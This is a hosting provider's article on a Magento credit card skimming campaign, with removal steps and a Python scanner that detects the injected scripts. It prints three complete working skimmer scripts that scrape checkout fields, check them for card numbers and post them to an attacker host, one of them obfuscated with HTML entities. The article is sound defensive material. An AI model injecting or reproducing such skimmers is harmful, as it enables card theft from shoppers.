How to fix malicious JavaScript Credit card Hijack?

Posted in Security. Tags: Magento, Magereport, Security

Credit card Hijack is malicious code injected into Magento that allows hackers to intercept financial data, such as credit card credentials. This article explains what this security breach means, what the consequences are and how you can fix it.

After analyzing the hack we discovered that no Hypernodes were compromised. Although none of our customers’ shops suffer from the Credit card Hijack, we do recommend you check your site with magereport.com for other vulnerabilities.

What is Credit card Hijack?

Credit card Hijack is malicious code injected into Magento that allows hackers to intercept financial data, such as credit card credentials. With this attack, credit card data is captured continuously and in unencrypted form: the malware is loaded into the browser of your website’s visitors and intercepts the credit card details the moment your customer types them in. At that point the details are not encrypted yet.

Once the leak was discovered we analyzed the malware. We found that, at this moment, a staggering 3500 Magento shops are part of a zombie network that intercepts credit card credentials and sends this data to so-called command & control servers (a network of servers where hackers collect this sort of data). This is the first time we have encountered automated credit card fraud on this scale. Hackers have clearly become far more professional at automating large-scale credit card fraud.

Read more about Credit card Hijack

We suspect this leak has been made possible due to unpatched Magento shops. So if you haven’t completely patched your Magento shop yet, make sure you do. Use Magereport.com to check if there are any patches not yet installed.

What are the consequences?

Credit card Hijack allows hackers to intercept your customers’ financial data. With this information they can commit credit card fraud worldwide, causing a lot of financial damage.

The fraud can be traced back to May 12th, which implies the malpractice went unnoticed for months and is still active.

How do I fix it?

Fixing this breach is not an easy task. If you don’t have a lot of knowledge of Magento’s security, we recommend you hire a Magento developer or specialist experienced in Magento security.

Apply all available Magento patches

Scan your shop with Magereport.com to find out which patches have and have not been installed yet. When a patch isn’t installed, install it following the instructions given or use the article How to apply Magento Patches.

Review and remove admin users

Review all admin users in your system via Magento’s backend (navigate to System > Permissions > Roles). Remove any accounts you are not actively using and set strong passwords for all admin users you do use.

Remove unknown scripts (PHP & Javascript)

Search your shop for scripts similar to the ones below and remove them. Searching and removing can be done via Magento’s backend. Once logged in to your backend (screenshots below):

  1. Navigate to System -> Configuration
  2. Go to Design (under General)
  3. Scroll down and open HTML Head to check Miscellaneous Scripts
  4. Scroll down and open Footer to check Miscellaneous HTML

[Screenshot 1: System -> Configuration]

[Screenshot 2: Go to Design (under General)]

[Screenshot 3: Scroll down to Miscellaneous Scripts]

[Screenshot 4: Scroll down and open Footer]

If Miscellaneous scripts and Miscellaneous HTML are empty, you’re most likely safe. If not, check if they contain the scripts below:

The script below is an example of a minified version of the scraper Javascript.

<script>function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")||(document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"),u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+jj("SESSIID")),console.clear()}}})});</script>

The script below is an example of Credit card Hijack’s malicious code. It installs the functions ‘send’ and ‘clk’, which allow hackers to collect the names and contents of every common form input element when your customer clicks a button or submits a form.

<script>
var snd =null;
window.onload = function () {
 if((new RegExp('onepage')).test(window.location)) {
 send();
 
 }
};
 
function clk() {
 var inp=document.querySelectorAll("input, select, textarea, checkbox");
 for (var i=0;i<inp.length;i++){
 if(inp[i].value.length>0) {
 var nme=inp[i].name;
 if(nme=='') { nme=i; }
 snd+=inp[i].name+'='+inp[i].value+'&';
 }
 }
 
}
 
function send() {
var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
 for (var i=0;i<btn.length;i++){
 var b=btn[i];
 if(b.type!='text' && b.type!='select' && b.type!='checkbox' && b.type!='password' && b.type!='radio') {
 if(b.addEventListener) {
 b.addEventListener("click", clk, false);
 }else {
 b.attachEvent('onclick', clk);
 }
 }
 }
 
 var frm=document.querySelectorAll("form");
 for (var i=0;i<frm.length;i++){
 if(frm[i].addEventListener) {
 frm[i].addEventListener("submit", clk, false);
 }else {
 frm[i].attachEvent('onsubmit', clk);
 }
 }
 
 if(snd!=null) {
 console.clear();
 var cc = new RegExp("[0-9]{13,16}");
 var asd="0";
 if(cc.test(snd)){
 asd="1" ;
 }
var http = new XMLHttpRequest();
http.open("POST","https://bad.guy/jquery.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("data="+snd+"&asd="+asd+"&id_id=ano.nym");
console.clear();
 }
 snd=null;
 setTimeout('send()', 150);
}
 
</script>

The script below was found during the research done by Byte. It covers the same functionality as the script above, but is harder to spot because it is normally included in minified form (as in the first sample above); this is the readable version. In this script jQuery is used to add an anonymous click event handler to every button on the page. When someone clicks a button, the function is triggered and collects all input data. It checks for credit card numbers and sends this information off to the hackers’ data collection server.

<script>
 function jj(e) {
 var t = "; " + document.cookie
 , o = t.split("; " + e + "=");
 return 2 == o.length ? o.pop().split(";").shift() : void 0
 }
 jj("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime())
 , jQuery(function (e) {
 e("button").on("click", function () {
 var t = ""
 , o = "post"
 , n = window.location;
 if (new RegExp("onepage|checkout").test(n)) {
 for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++)
 if (c[i].value.length > 0) {
 var a = c[i].name;
 "" == a && (a = i)
 , t += a + "=" + c[i].value + "&"
 }
 if (t) {
 var l = new RegExp("[0-9]{13,16}")
 , u = new XMLHttpRequest;
 u.open(o, e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(), !0)
 , u.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
 , u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + jj("SESSIID"))
 , console.clear()
 }
 }
 })
 });
</script>
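The backend check above (Miscellaneous Scripts and Miscellaneous HTML) can be automated against the database rows behind those two fields. The script below is an added example written for this article; it is not Byte/Hypernode tooling or Magento code. It assumes that those two admin fields are stored in Magento 1’s core_config_data table under the paths design/head/includes and design/footer/absolute_footer, decodes the numeric HTML entities the minified sample uses to hide its upload URL, and flags values containing the traits shared by the three samples above. All rows it scans are constructed: one benign value and one built from fragments of the minified sample.

```python
"""Scan Magento 1 core_config_data values for the credit card hijack scripts.

Added example for this article; not Byte/Hypernode or Magento code.
Assumption: the two admin fields the article tells you to inspect are stored
under the config paths design/head/includes (HTML Head > Miscellaneous
Scripts) and design/footer/absolute_footer (Footer > Miscellaneous HTML).
All sample rows below are constructed.
"""
import html
import re

WATCHED_PATHS = {
    "design/head/includes": "HTML Head > Miscellaneous Scripts",
    "design/footer/absolute_footer": "Footer > Miscellaneous HTML",
}

# Traits shared by the three samples quoted in the article.
INDICATORS = [
    ("scrapes every form field",
     re.compile(r'querySelectorAll\(\s*["\']input, select, textarea, checkbox')),
    ("only fires on checkout pages",
     re.compile(r'RegExp\(\s*["\'](?:onepage|checkout)')),
    ("tests captured data for a card number", re.compile(r'\[0-9\]\{13,16\}')),
    ("SESSIID tracking cookie", re.compile(r'SESSIID')),
    ("console.clear() to hide traces", re.compile(r'console\.clear\(\)')),
    ("XMLHttpRequest from an inline script", re.compile(r'XMLHttpRequest')),
]

# Eight or more consecutive numeric character references: the minified sample
# hides its upload URL this way, so a plain-text search for the hostname fails.
ENTITY_RUN = re.compile(r'(?:&#\d{1,3};){8,}')


def hidden_urls(value):
    """Decode numeric-entity runs and return the ones that spell a URL."""
    urls = []
    for match in ENTITY_RUN.finditer(value):
        decoded = html.unescape(match.group(0)).strip()
        if decoded.lower().startswith(("http://", "https://", "//")):
            urls.append(decoded)
    return urls


def scan_value(value):
    """Return the list of indicator names matched by one config value."""
    decoded = html.unescape(value)  # match against the decoded form as well
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    hits += ["entity-encoded URL " + url for url in hidden_urls(value)]
    return hits


def verdict(hits):
    """Two or more traits together are the hijack script; one deserves a look."""
    if len(hits) >= 2:
        return "malicious"
    return "suspicious" if hits else "review"


def scan_config(rows):
    """rows: (path, scope, scope_id, value) tuples as in core_config_data.

    Empty values in the watched fields are skipped (the article's "most likely
    safe" case); every non-empty value is reported so it gets a manual look
    even when no indicator matches.
    """
    findings = []
    for path, scope, scope_id, value in rows:
        if path not in WATCHED_PATHS or not value or not value.strip():
            continue
        hits = scan_value(value)
        findings.append({
            "field": WATCHED_PATHS[path],
            "scope": f"{scope}:{scope_id}",
            "hits": hits,
            "verdict": verdict(hits),
        })
    return findings


# Constructed: characteristic fragments of the article's minified sample (not a
# working copy), with the entity-encoded URL left intact.
MALICIOUS_FRAGMENT = (
    '<script>jj("SESSIID")||(document.cookie="SESSIID="+(new Date).getTime());'
    'if(new RegExp("onepage|checkout").test(window.location)){'
    'var c=document.querySelectorAll("input, select, textarea, checkbox");'
    'var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;'
    'u.open("post",e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;'
    '&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;'
    '&#121;&#46;&#112;&#104;&#112;").text(),!0);console.clear()}</script>'
)

SAMPLE_ROWS = [  # constructed core_config_data rows
    ("design/head/includes", "default", 0, '<script>var shopTheme = "blue";</script>'),
    ("design/footer/absolute_footer", "stores", 1, MALICIOUS_FRAGMENT),
    ("design/head/includes", "stores", 2, ""),                 # empty: skipped
    ("web/unsecure/base_url", "default", 0, "http://shop.example/"),  # not watched
]

if __name__ == "__main__":
    for finding in scan_config(SAMPLE_ROWS):
        print(f"{finding['verdict']:10} {finding['field']} ({finding['scope']})")
        for hit in finding["hits"]:
            print("   -", hit)
```

To run it against a real shop, export the rows with `SELECT path, scope, scope_id, value FROM core_config_data WHERE path IN ('design/head/includes', 'design/footer/absolute_footer')` and feed them to scan_config; checking every scope, not only the default, matters because the sample above was injected at store-view level. The entity decoding is the part a manual search misses: the hostname never appears as text in the stored value.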

Recover your shop

Since Credit card Hijack is an ongoing credit card fraud dating from May this year, it’s difficult to pinpoint exactly how the hackers got in. We assume it’s due to a combination of various known Magento leaks (several Magento patches were released in the past months, with a lot of media coverage). It’s likely hackers used these security vulnerabilities to set up this credit card fraud.

We recommend you ‘clean’ your shop following the steps written in the article Recover a hacked Magento Shop after installing all Magento patches, deleting inactive Magento admins and removing malicious code.

Need help?

Magento is not an easy open source CMS. Although we’re very skilled at hosting Magento shops, making them fast and keeping conversion high, we’re not Magento developers. Luckily, we know a lot of agencies that do know a lot about how Magento works. If you need help, don’t hesitate to contact one of these agencies.
